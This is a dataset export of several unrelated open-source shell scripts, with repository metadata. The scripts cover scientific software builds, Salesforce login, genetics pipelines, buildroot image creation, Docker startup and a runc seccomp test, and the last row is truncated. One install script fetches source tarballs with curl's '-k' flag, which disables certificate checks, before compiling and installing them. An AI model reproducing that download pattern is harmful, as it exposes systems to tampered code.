blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
27fd54e101e002bfdc14929a0304c6fa6ba89ee7
|
Shell
|
noamross/shinyapps-package-dependencies
|
/packages/seasonal/install
|
UTF-8
| 619
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
set -x
set -e
apt-get -qq update
ln -s /usr/bin/gfortran /usr/bin/g77
mkdir -p /opt/x13as
# download & extract X-13ARIMA-SEATS
mkdir -p /tmp/x13assrc
mkdir -p /tmp/x13ashtmlsrc
curl -s -k https://www.census.gov/ts/x13as/unix/x13assrc.tar.gz | tar xzv -C /tmp/x13assrc
curl -s -k https://www.census.gov/ts/x13as/unix/x13ashtmlsrc.tar.gz | tar xzv -C /tmp/x13ashtmlsrc
# compile x13as
cd /tmp/x13assrc
make -f makefile.g77
cp x13as /opt/x13as
# compile x13asHTML
cd /tmp/x13ashtmlsrc
make -f makefile.g77
cp x13asHTML /opt/x13as
# configure R
echo X13_PATH = /opt/x13as >> /usr/lib/R/etc/Renviron.site
| true
|
2af2ce34434698781ed017165f8a2b5ff06b5146
|
Shell
|
stevearc/dotfiles
|
/.config/qtile/setup-monitors.sh
|
UTF-8
| 394
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
num_monitors=$(xrandr | grep "\bconnected" -c)
monitor_config="$HOME/.screenlayout/layout${num_monitors}.sh"
if [ -e "$monitor_config" ]; then
if ! grep -q "$monitor_config" ~/.cache/qtile/last_layout 2>/dev/null || [ "$1" == "-f" ]; then
echo "run $(basename "$monitor_config")"
echo -n "$monitor_config" >~/.cache/qtile/last_layout
"$monitor_config"
fi
fi
| true
|
846a8ac6a70ea9a91d9f59af658627b1362ea5a3
|
Shell
|
bjanderson70/misc
|
/getSID.sh
|
UTF-8
| 1,332
| 3.984375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh -x
#--------------------------------------------------------
# AUTHOR: Salesforce
# DESCRIPTION:
# This script pulls the user's session ID. It assumes
# the user properly set the 'sf_login.txt' information,
# which includes:
# <UID> : User Name
# <PWD+TOKEN> : Password + Security Token
#
# The results are saved in '.sf_results' file
#--------------------------------------------------------
#
# How to use the script
#
usage() {
[ "$1" ] && echo 1>&2 "Info: $1" ; echo 1>&2 \
'
usage: getSID <true|false>
OPTIONS:
true : is a Sandbox
false : is not a Sandbox
'
exit 2;
}
[ "$1" ] || usage "is Sandbox is expected"
if [ ! -s sf_login.txt ]
then
echo " Missing the 'sf_login.txt' file"
exit 2;
fi
if test "$1" == 'true'; then
echo " Getting SID from a Sandbox... [results found in .sf_results]..."
curl -f -s -X POST https://test.salesforce.com/services/Soap/u/41.0 -H "Content-Type: text/xml; charset=UTF-8" -H "SOAPAction: login" -d @sf_login.txt > ./.sf_results
else
echo " Getting SID from Production... [results found in .sf_results]..."
curl -f -s -X POST https://login.salesforce.com/services/Soap/u/41.0 -H "Content-Type: text/xml; charset=UTF-8" -H "SOAPAction: login" -d @sf_login.txt > ./.sf_results
fi
exit $?;
| true
|
00e8887777ab61d8d1119770876c35018d18b01e
|
Shell
|
mitchellolislagers/cell_type_enrichment_pipeline
|
/LDSC/bivariate_correlations/calculate_and_collect_rg.sh
|
UTF-8
| 3,168
| 3.03125
| 3
|
[] |
no_license
|
#!bin/bash
##Script to estimate genetic correlations among phenotypes
##Requirements: Munged sumstats
##By: Mitchell Olislagers
##Last updated: 10 Feb 2020
ldsc_dir=/hpc/hers_en/molislagers/LDSC/ldsc
sumstats_dir=/hpc/hers_en/molislagers/LDSC/summary_statistics
ref_dir=/hpc/hers_en/molislagers/LDSC/ref_data/regression
munged_dir=${sumstats_dir}/munged_sumstats
rg_dir=/hpc/hers_en/molislagers/LDSC/bivariate_correlations/analysis_phase3
rg_output_dir=/hpc/hers_en/molislagers/LDSC/bivariate_correlations/output_phase3
conda activate ldsc
cd ${munged_dir}
phenotypes=("ADHD" "AN" "anxiety" "ASD" "BIP" "cross" "MDD" "OCD" "PTSD" "SCZ" "TS" "alcohol_use" "alcohol_dependence" "drinks_pw" "cannabis" "smoking_initiation" "ever_smoked" "cigarettes_pd" "smoking_cessation" "ALS" "alzheimers" "all_epilepsy" "generalized" "focal" "all_stroke" "cardioembolic" "ischemic" "large_artery" "small_vessel" "parkinson" "height" "BMI" "chronotype" "daytime_sleepiness" "overall_sleep_duration" "short_sleep_duration" "long_sleep_duration" "insomnia" "intelligence" "educational_attainment" "cognitive_performance" "neuroticism")
phenotypes_munged=( "${phenotypes[@]/%/.sumstats.gz}" )
for phenotype in "${phenotypes_munged[@]}"; do
#Break the loop if only 1 variable in array
if [ "${#phenotypes_munged[@]}" -eq 1 ]; then
break
fi
#Join array by comma
rg_sumstats=$(printf ",%s" "${phenotypes_munged[@]}")
rg_sumstats=(${rg_sumstats:1})
#Run bivariate correlations
python ${ldsc_dir}/ldsc.py --rg $rg_sumstats --ref-ld-chr ${ref_dir}/1000G_EUR_Phase3_baseline/baseline. --w-ld-chr ${ref_dir}/1000G_Phase3_weights_hm3_no_MHC/weights.hm3_noMHC. --out ${rg_dir}/$phenotypes
#Remove first variable of array
phenotypes_munged=(${phenotypes_munged[@]:1})
phenotypes=(${phenotypes[@]:1})
done
python ${ldsc_dir}/ldsc.py --rg smoking_initiation.sumstats.gz,ever_smoked.sumstats.gz --ref-ld-chr ${ref_dir}/1000G_EUR_Phase3_baseline/baseline. --w-ld-chr ${ref_dir}/1000G_Phase3_weights_hm3_no_MHC/weights.hm3_noMHC. --out ${rg_dir}/test.log
cd ${rg_dir}
phenotypes=("ADHD" "AN" "anxiety" "ASD" "BIP" "cross" "MDD" "OCD" "PTSD" "SCZ" "TS" "alcohol_use" "alcohol_dependence" "drinks_pw" "cannabis" "smoking_initiation" "ever_smoked" "cigarettes_pd" "smoking_cessation" "ALS" "alzheimers" "all_epilepsy" "generalized" "focal" "all_stroke" "cardioembolic" "ischemic" "large_artery" "small_vessel" "parkinson" "height" "BMI" "chronotype" "daytime_sleepiness" "overall_sleep_duration" "short_sleep_duration" "long_sleep_duration" "insomnia" "intelligence" "educational_attainment" "cognitive_performance")
#Create header file
awk '/Summary/{y=1;next}y' ${phenotypes}.log > ${phenotypes}_no_top.log
head -n 1 ${phenotypes}_no_top.log > header_file.txt
rm ${phenotypes}_no_top.log
for phenotype in "${phenotypes[@]}"; do
#Only select summary of results
awk '/Summary/{y=1;next}y' ${phenotype}.log > ${phenotype}_no_top.log
sed -i -e "1d" ${phenotype}_no_top.log
head -n -3 ${phenotype}_no_top.log > ${phenotype}_no_top_no_bottom.log
#Append to header file
cat ${phenotype}_no_top_no_bottom.log >> header_file.txt
done
cp ${rg_dir}/header_file.txt ${rg_output_dir}/all_rg_phase3.log
| true
|
e0746d1cfaa32e4a840edca502cf9f1512221603
|
Shell
|
litvinenkonick/home
|
/.local/bin/network-startup
|
UTF-8
| 876
| 3.421875
| 3
|
[] |
no_license
|
#! /bin/bash
function command_exists () {
command -v "$1" > /dev/null 2>&1;
}
local='lo'
connection=0
while [ $connection == 0 ] ; do
for interface in /sys/class/net/* ; do
if [[ ! "$interface" == *"$local"* ]]; then
connection=$(cat $interface/carrier)
fi
done
sleep 0.5
done
if command_exists quiterss ; then
echo "run quiterss"
quiterss &
fi
if command_exists evolution ; then
echo "run evolution"
evolution &
fi
if command_exists discord ; then
sleep 0.5
echo "run discord"
GDK_BACKEND=x11 discord &
fi
if command_exists wire-desktop ; then
sleep 0.5
echo "run wire-desktop"
wire-ozone &
fi
# if command_exists signal-desktop ; then
# sleep 0.5
# echo "run signal-desktop"
# GDK_BACKEND=x11 signal-desktop &
# fi
# if command_exists slack ; then
# sleep 0.5
# echo "run slack"
# GDK_BACKEND=x11 slack &
# fi
| true
|
32f66545ced5c7780d0ba2e9cc9d42cdbfb60d38
|
Shell
|
ferhatgec/freebsd-doc
|
/tools/update_translate_template.sh
|
UTF-8
| 2,892
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/sh
#
# Copyright (c) 2021 Danilo G. Baio <dbaio@FreeBSD.org>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
ALL_COMPONENTS="documentation
website"
COMPONENTS="${1:-$ALL_COMPONENTS}"
GIT_IGNORE_FILES="toc-examples.adoc
toc-figures.adoc
toc-tables.adoc
toc.adoc
toc-1.adoc
toc-2.adoc
toc-3.adoc
toc-4.adoc
toc-5.adoc"
for remove_file in $GIT_IGNORE_FILES; do
find documentation/content/en/ -name "$remove_file" -delete -print || exit 1
done
for component in $COMPONENTS; do
if [ ! -d "$component/content/en" ]; then
echo "Directory '$component/content/en' not found."
exit 1
fi
for document in $(find "$component/content/en/" -name "*.adoc" ); do
name=$(basename -s .adoc "$document")
# Ignore some files
if [ "$name" = "chapters-order" ]; then
continue
fi
if [ "$document" = "documentation/content/en/books/books.adoc" ]; then
continue
fi
dirbase=$(dirname "$document")
echo "$document"
if [ -f "$dirbase/$name.po" ]; then
po4a-updatepo \
--format asciidoc \
--option compat=asciidoctor \
--option yfm_keys=title,part,description \
--master "$document" \
--master-charset "UTF-8" \
--copyright-holder "The FreeBSD Project" \
--package-name "FreeBSD Documentation" \
--po "$dirbase/$name.po"
if [ -f "$dirbase/$name.po~" ]; then
rm -f "$dirbase/$name.po~"
fi
else
po4a-gettextize \
--format asciidoc \
--option compat=asciidoctor \
--option yfm_keys=title,part,description \
--master "$document" \
--master-charset "UTF-8" \
--copyright-holder "The FreeBSD Project" \
--package-name "FreeBSD Documentation" \
--po "$dirbase/$name.po"
fi
done
done
| true
|
b49b809b90c30b941df7633e9b4de98789da7157
|
Shell
|
zy1417548204/dialouge_motion_recognize
|
/go_run.sh
|
UTF-8
| 3,957
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
#-----说明--------
#sed 追加文件内容
#1、a 在匹配行后面追加
#2、i 在匹配行前面追加
#3、r 将文件内容追加到匹配行后面
#4、w 将匹配行写入指定文件
#-----说明--------
# 修改配置,使用预训练好的模型
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./textcnn' run.sh
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
# 模型预测,并查看结果
!cd /home/aistudio/work/ && sh run.sh infer
# 修改配置,选择cnn模型
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"cnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i 's#"init_checkpoint":.*$#"init_checkpoint":"",#' config.json
# 修改训练后模型保存的路径
!cd /home/aistudio/work/ && sed -i '6c CKPT_PATH=./save_models/cnn' run.sh
# 模型训练
!cd /home/aistudio/work/ && sh run.sh train
# 确保使用的模型为CNN
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"cnn_net",#' config.json
# 使用刚才训练的cnn模型
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/cnn/step_756' run.sh
# 模型评估
!cd /home/aistudio/work/ && sh run.sh eval
# 查看预测的数据
!cat /home/aistudio/data/data12605/data/infer.txt
# 使用刚才训练的cnn模型
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"cnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/cnn/step_756' run.sh
# 模型预测
!cd /home/aistudio/work/ && sh run.sh infer
# 更改模型为TextCNN
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i 's#"init_checkpoint":.*$#"init_checkpoint":"",#' config.json
# 修改模型保存目录
!cd /home/aistudio/work/ && sed -i '6c CKPT_PATH=./save_models/textcnn' run.sh
# 模型训练
!cd /home/aistudio/work/ && sh run.sh train
# 使用上面训练好的textcnn模型
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/textcnn/step_756' run.sh
# 模型评估
!cd /home/aistudio/work/ && sh run.sh eval
#基于预训练的TextCNN进行Finetune
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
# 使用预训练的textcnn模型
!cd /home/aistudio/work/ && sed -i 's#"init_checkpoint":.*$#"init_checkpoint":"./textcnn",#' config.json
# 修改学习率和保存的模型目录
!cd /home/aistudio/work/ && sed -i 's#"lr":.*$#"lr":0.0001,#' config.json
!cd /home/aistudio/work/ && sed -i '6c CKPT_PATH=./save_models/textcnn_finetune' run.sh
# 模型训练
!cd /home/aistudio/work/ && sh run.sh train
# 修改配置,使用上面训练得到的模型
!cd /home/aistudio/work/ && sed -i 's#"model_type":.*$#"model_type":"textcnn_net",#' config.json
!cd /home/aistudio/work/ && sed -i '7c MODEL_PATH=./save_models/textcnn_finetune/step_756' run.sh
# 模型评估
!cd /home/aistudio/work/ && sh run.sh eval
#基于ERNIE模型进行Finetune
!cd /home/aistudio/work/ && mkdir -p pretrain_models/ernie
%cd /home/aistudio/work/pretrain_models/ernie
# 获取ernie预训练模型
!wget --no-check-certificate https://baidu-nlp.bj.bcebos.com/ERNIE_stable-1.0.1.tar.gz -O ERNIE_stable-1.0.1.tar.gz
!tar -zxvf ERNIE_stable-1.0.1.tar.gz && rm ERNIE_stable-1.0.1.tar.gz
# 基于ERNIE模型finetune训练
!cd /home/aistudio/work/ && sh run_ernie.sh train
# 模型评估
!cd /home/aistudio/work/ && sh run_ernie.sh eval
# 查看所有参数及说明
!cd /home/aistudio/work/ && python run_classifier.py -h
# 解压分词工具包,对测试数据进行分词
!cd /home/aistudio/work/ && unzip -qo tokenizer.zip
!cd /home/aistudio/work/tokenizer && python tokenizer.py --test_data_dir test.txt.utf8 > new_query.txt
# 查看分词结果
!cd /home/aistudio/work/tokenizer && cat new_query.txt
| true
|
4a4437a59b1a36e2437de48db4615f46f6a1572d
|
Shell
|
swingywc/sshfs-bash
|
/get_mount_data.sh
|
UTF-8
| 653
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
get_mount_data() {
# Preset your file directory
file="/Users/wingchoy/sshfs.txt"
isMountExist="false"
# If file path incorrect, send error message
if [[ ! -f $file ]]; then
mount_msg 0fnf
fi
# For-loop and get the specific mount data
while IFS='' read -r line; do
array=($line)
if [[ $1 == ${array[0]} ]]; then
username="${array[1]}"
ipaddr="${array[2]}"
folderpath="${array[3]}"
targetpath="${array[4]}"
isMountExist="true"
fi
done <"$file"
# If cannot find the mount in the list, send error message
if [[ $isMountExist == "false" ]]; then
mount_msg 0dnf
fi
}
| true
|
d54242982f5a1799369b66146dd307808c0f4bda
|
Shell
|
bluecatchbird/rpi-stuff
|
/createBuildrootImage.sh
|
UTF-8
| 3,900
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/sh
echo "do not run this howto as script!"
exit 0
BUILDROOT_VERSION=2015.02
BUILDROOT_NAME=buildroot-${BUILDROOT_VERSION}
BUILDROOT_FOLDER=build/${BUILDROOT_NAME}/
mkdir -p build download output mnt
# download buildroot
wget http://buildroot.net/downloads/${BUILDROOT_NAME}.tar.bz2 -P download/
tar xvfj download/${BUILDROOT_NAME}.tar.bz2 -C $(dirname $BUILDROOT_FOLDER)
# configure
make raspberrypi_defconfig -C $BUILDROOT_FOLDER
make menuconfig -C $BUILDROOT_FOLDER
make linux-menuconfig -C $BUILDROOT_FOLDER
# save own config
cp ${BUILDROOT_FOLDER}/.config my_raspberrypi_defconfig
# run buildroot
make -C $BUILDROOT_FOLDER
# special buildroot folder
ls -l $BUILDROOT_FOLDER/dl # downloades sources as tarballs, git and svn repos too
ls -l $BUILDROOT_FOLDER/output/build # extracted sources
ls -l $BUILDROOT_FOLDER/output/host # tools for host, compiler, lzop ....
ls -l $BUILDROOT_FOLDER/output/images # kernel, bootloader, firmware, devicetree, ramdisk ....
ls -l $BUILDROOT_FOLDER/output/staging # cross comiled libs for target
ls -l $BUILDROOT_FOLDER/output/target # rfs for target
################################################
# some buildroot cmds
## rebuild kernel
## $ make linux-rebuild -C $BUILDROOT_FOLDER
## clear all in output/ folder
## $ make clean -C $BUILDROOT_FOLDER
## clear all in output/ and dl/ folder
## $ make distclean -C $BUILDROOT_FOLDER
#################################################
# configure network
cat > ${BUILDROOT_FOLDER}/output/target/etc/network/interfaces << 'EOF'
# Configure Loopback
auto lo
iface lo inet loopback
# Configure eth0 with static IP
auto eth0
iface eth0 inet static
address 192.168.1.10
network 192.168.1.0
netmask 255.255.255.0
# Configure eth0 with dhcp IP
# auto eth0
# iface eth0 inet dhcp
EOF
# mount boot partition
echo '/dev/mmcblk0p1 /boot vfat defaults 0 0' >> ${BUILDROOT_FOLDER}/output/target/etc/fstab
# enable root shell on serial console
echo '/dev/ttyAMA0::respawn:/sbin/getty 115200 /dev/ttyAMA0 -n -l /sbin/sulogin' >> ${BUILDROOT_FOLDER}/output/target/etc/inittab
# rebuild rootfs.tar with modifications
make -C $BUILDROOT_FOLDER
# example usage of buildroot cross compiler
echo -en "#include <stdio.h>\nint main(){printf(\"Hello World\");}" | ${BUILDROOT_FOLDER}/output/host/usr/bin/arm-linux-gcc -o test.bin -xc -
# create inital image file
dd if=/dev/zero of=output/rpi.img bs=1M count=60
# create partitions
fdisk output/rpi.img << 'EOF'
n
+20M
t
c
n
t
2
83
p
w
EOF
# get partition from image to loopback
kpartx -as output/rpi.img
# write file systems
mkfs.vfat /dev/mapper/loop0p1
mkfs.ext2 /dev/mapper/loop0p2
# mount partitions
mkdir -p mnt/boot mnt/rfs
mount /dev/mapper/loop0p1 mnt/boot
mount /dev/mapper/loop0p2 mnt/rfs
# copy kernel and firmware to boot partition
cp ${BUILDROOT_DIR}/output/images/zImage mnt/boot/
cp ${BUILDROOT_DIR}/output/images/rpi-firmware/* mnt/boot/
# set kernel cmdline
## raspbian
echo "dwc_otg.lpm_enable=0 console=ttyAMA0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext2 elevator=deadline rootwait" > mnt/boot/cmdline.txt
## flash boot
echo "dwc_otg.lpm_enable=0 console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 elevator=deadline rootwait root=/dev/mmcblk0p2 rootfstype=ext4" > mnt/boot/cmdline.txt
## or nfsboot:
echo "dwc_otg.lpm_enable=0 console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 elevator=deadline rootwait ip=::::rpi::dhcp root=/dev/nfs nfsroot=192.168.1.1:/mnt/shares/rpifs/nfsroot,tcp,rsize=32768,wsize=32768" > mnt/boot/cmdline.txt
## speed up boot time ( ~0.5s) by adding "quiet" to cmdline.txt
# extract rfs
tar xvf ${BUILDROOT_FOLDER}/image/rootfs.tar -C mnt/rfs
# free image
sync
umount mnt/boot
umount mnt/rfs
kpartx -d output/rpi.img
# flash image to sdcard
dd if=output/rpi.img of=/dev/sdX
| true
|
d7297fe4cd50f956878dca5bb0e483ced15faa07
|
Shell
|
Prosefionol/RPO
|
/libs/spdlog/build/compile.sh.bash
|
UTF-8
| 431
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
#ABI=armaebi-v7a
ABI=x86
#ABI=arm64-v8a
#ABI=x86_64
ANDROID_NDK=/home/ilyalinux/Android/Sdk/ndk/23.0.7123448
TOOL_CHAIN=${ANDROID_NDK}/build/cmake/android.toolchain.cmake
CMAKE=/home/ilyalinux/Android/Sdk/cmake/3.18.1/bin/cmake
mkdir -p ${ABI}
cd ${ABI}
${CMAKE} ../../spdlog -DCMAKE_SYSTEM_NAME=Android -DCMAKE_SYSTEM_VERSION=21 -DANDROID_ABI=${ABI} -DCMAKE_TOOLCHAIN_FILE=${TOOL_CHAIN}
${CMAKE} --build .
| true
|
355b0ebd9556b945ca9b0bca1ab976cdabaeddd4
|
Shell
|
nbcgo1/vpn-bastion
|
/scripts/get_amis.sh
|
UTF-8
| 719
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
# List ami ids of this images in all regions
# In a format for variable.tf
# Find latest names with get_latest_amis_names.sh
amiName="amzn-ami-hvm-2017.09.1.20180307-x86_64-gp2";
echo ""
echo " >>> Searching in all regions for for $amiName <<<"
echo ""
echo "# $amiName"
echo "variable \"amis\" {"
echo " type = \"map\""
echo " default = {"
for i in `aws ec2 describe-regions --region eu-west-2 --query 'Regions[*].{Name:RegionName}' --output text`
do
echo -n " \"$i\" = \""
output=`aws ec2 describe-images --owners amazon --region $i \
--filters "Name=name,Values=$amiName" \
--query 'Images[*].{ID:ImageId}' --output text`
echo "$output\""
done
echo " }"
echo "}"
echo ""
| true
|
8431268367592f588b4b4257f1361e19d44a9abb
|
Shell
|
ftx-vmc/docker_container
|
/scripts/vmc_dc_start.sh
|
UTF-8
| 7,406
| 4.25
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
SUPPORTED_ARCHS=(x86_64 aarch64)
HOST_ARCH="$(uname -m)"
HOST_OS="$(uname -s)"
DOCKER_RUN="docker run"
USE_GPU_HOST=0
USER_AGREED="no"
tag="latest"
SHM_SIZE="2G"
network="host"
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
function show_usage() {
filename=$(basename $0)
cat <<EOF
Usage: $filename [options] ...
OPTIONS:
-h, --help Display this help and exit.
-i, --image <IMAGE> Docker image name.
-t, --tag <TAG> Specify docker image with tag <TAG> to start.
-n, --name <name> Container name.
--network <name> Default: host
--shm-size <bytes> Size of /dev/shm . Passed directly to "docker run"
stop Stop all running containers which belong to you.
EOF
}
function error()
{
local _msg=$1
local _do_help=$2
echo -e "-E- $_msg"
if [ $_do_help -eq 1 ]; then
do_help
fi
exit 1
}
function warning()
{
local _msg=$1
echo "-W- $_msg"
return 0
}
function info()
{
local _msg=$1
echo "-I- $_msg"
return 0
}
function stop_all_containers_for_user() {
local force="$1"
local running_containers
running_containers="$(docker ps -a --format '{{.Names}}')"
for container in ${running_containers[*]}; do
if [[ "${container}" =~ ${USER}_.* ]]; then
#printf %-*s 70 "Now stop container: ${container} ..."
#printf "\033[32m[DONE]\033[0m\n"
#printf "\033[31m[FAILED]\033[0m\n"
info "Now stop container ${container} ..."
if docker stop "${container}" >/dev/null; then
if [[ "${force}" == "-f" || "${force}" == "--force" ]]; then
docker rm -f "${container}" >/dev/null
fi
info "Done."
else
warning "Failed."
fi
fi
done
if [[ "${force}" == "-f" || "${force}" == "--force" ]]; then
info "OK. Done stop and removal"
else
info "OK. Done stop."
fi
}
function _optarg_check_for_opt() {
local opt="$1"
local optarg="$2"
if [[ -z "${optarg}" || "${optarg}" =~ ^-.* ]]; then
error "Missing argument for ${opt}. Exiting..." 1
exit 2
fi
}
function parse_arguments() {
shm_size=""
while [ $# -gt 0 ]; do
local opt="$1"
shift
case "${opt}" in
-i | --image)
image_name="$1"
shift
_optarg_check_for_opt "${opt}" "${image_name}"
;;
-t | --tag)
tag="$1"
shift
_optarg_check_for_opt "${opt}" "${tag}"
;;
-h | --help)
show_usage
exit 1
;;
-n | --name)
container_name="$1"
shift
_optarg_check_for_opt "${opt}" "${container_name}"
;;
--shm-size)
shm_size="$1"
shift
_optarg_check_for_opt "${opt}" "${shm_size}"
;;
--network)
network="$1"
shift
_optarg_check_for_opt "${opt}" "$network"
;;
stop)
stop_all_containers_for_user "-f"
exit 0
;;
*)
warning "Unknown option: ${opt}"
exit 2
;;
esac
done # End while loop
[[ -n "${shm_size}" ]] && SHM_SIZE="${shm_size}"
}
function determine_gpu_use_host() {
if [ "${HOST_ARCH}" = "aarch64" ]; then
if lsmod | grep -q "^nvgpu"; then
USE_GPU_HOST=1
fi
else
# Check nvidia-driver and GPU device
local nv_driver="nvidia-smi"
if [ ! -x "$(command -v ${nv_driver})" ]; then
warning "No nvidia-driver found. CPU will be used"
elif [ -z "$(eval ${nv_driver})" ]; then
warning "No GPU device found. CPU will be used."
else
USE_GPU_HOST=1
fi
fi
# Try to use GPU inside container
local nv_docker_doc="https://github.com/NVIDIA/nvidia-docker/blob/master/README.md"
if [ ${USE_GPU_HOST} -eq 1 ]; then
DOCKER_VERSION=$(docker version --format '{{.Server.Version}}')
if [[ -x "$(which nvidia-container-toolkit)" ]]; then
if dpkg --compare-versions "${DOCKER_VERSION}" "ge" "19.03"; then
DOCKER_RUN="docker run --gpus all"
else
warning "You must upgrade to Docker-CE 19.03+ to access GPU from container!"
USE_GPU_HOST=0
fi
elif [[ -x "$(which nvidia-docker)" ]]; then
DOCKER_RUN="nvidia-docker run"
else
USE_GPU_HOST=0
warning "Cannot access GPU from within container. Please install " \
"latest Docker and NVIDIA Container Toolkit as described by: "
warning " ${nv_docker_doc}"
fi
fi
}
function post_run_setup() {
if [ "${USER}" != "root" ]; then
cp $DIR/docker_start_user.sh /tmp
cp $DIR/get_grpid.pl /tmp
cp $DIR/centos_add_user.sh /tmp
docker exec -u root "${container_name}" bash -c '/tmp/docker_start_user.sh'
rm /tmp/docker_start_user.sh
rm /tmp/get_grpid.pl
rm /tmp/centos_add_user.sh
fi
}
function main() {
parse_arguments "$@"
info "Determine whether host GPU is available ..."
determine_gpu_use_host
info "USE_GPU_HOST: ${USE_GPU_HOST}"
local local_host="$(hostname)"
if [ -z ${DISPLAY+x} ]; then
display_opt=""
else
display_opt="-e DISPLAY=${DISPLAY:-:0}"
info "docker's env DISPLAY=$display_opt"
fi
local user="${USER}"
if [[ ! $container_name =~ ^$user ]]; then
container_name="${user}_$container_name"
fi
info "Starting docker container \"${container_name}\" ..."
local uid="$(id -u)"
local group="$(id -g -n)"
local gid="$(id -g)"
${DOCKER_RUN} -itd \
--name "${container_name}" ${display_opt} \
-e DOCKER_USER="${user}" \
-e USER="${user}" \
-e DOCKER_USER_ID="${uid}" \
-e DOCKER_GRP="${group}" \
-e DOCKER_GRP_ID="${gid}" \
-e DOCKER_IMG="${image_name}" \
-e HOST_OS="${HOST_OS}" \
-e USE_GPU_HOST="${USE_GPU_HOST}" \
-e NVIDIA_VISIBLE_DEVICES=all \
-e NVIDIA_DRIVER_CAPABILITIES=compute,video,graphics,utility \
--net ${network} \
-w /home/${user} \
--add-host "${local_host}:127.0.0.1" \
--hostname "${container_name}" \
--shm-size "${SHM_SIZE}" \
--pid=host \
-v /dev/null:/dev/raw1394 \
-v /tmp:/tmp \
${image_name}:${tag} \
/bin/bash
if [ $? -ne 0 ]; then
error "Failed to start docker container \"${container_name}\" based on image: ${image_name}:${tag}" 0
exit 1
fi
post_run_setup
info "Congratulations! You have successfully started the container ($container_name) based on image: ($image_name:$tag)"
info "To login into the newly created ${container_name} container, please run the following command:"
info " vmc_dc_enter.sh -n $container_name"
info "Enjoy!"
}
main "$@"
| true
|
19b06e5aeb676fd8cf422cfceb36f2a8577f1af6
|
Shell
|
d2l-ai/utils
|
/run_ipynb.sh
|
UTF-8
| 410
| 3.828125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -ex
if [ $# -ne 1 ]; then
echo "Usage: bash $0 NOTEBOOKS"
echo "E.g., bash run_notebooks.sh 'chap/*'"
echo "Execute all the notebooks and save outputs (assuming with Python 3)."
exit -1
fi
NOTEBOOKS=$1
for f in $NOTEBOOKS; do
echo "==Executing $f"
jupyter nbconvert --execute --ExecutePreprocessor.kernel_name=python3 --to notebook --ExecutePreprocessor.timeout=1200 --inplace $f
done
| true
|
347ecf3f07d1b45f49f0a8de1bc5ee252f310a82
|
Shell
|
dweomer/opencontainers-runc
|
/tests/integration/seccomp.bats
|
UTF-8
| 489
| 3.15625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bats
load helpers
function setup() {
setup_busybox
}
function teardown() {
teardown_bundle
}
@test "runc run [seccomp -ENOSYS handling]" {
TEST_NAME="seccomp_syscall_test1"
# Compile the test binary and update the config to run it.
gcc -static -o rootfs/seccomp_test "${TESTDATA}/${TEST_NAME}.c"
update_config ".linux.seccomp = $(<"${TESTDATA}/${TEST_NAME}.json")"
update_config '.process.args = ["/seccomp_test"]'
runc run test_busybox
[ "$status" -eq 0 ]
}
| true
|
1be41ae4d2db1a25f0a69dab324e81110f8f9177
|
Shell
|
AlisamTechnology/blackarch
|
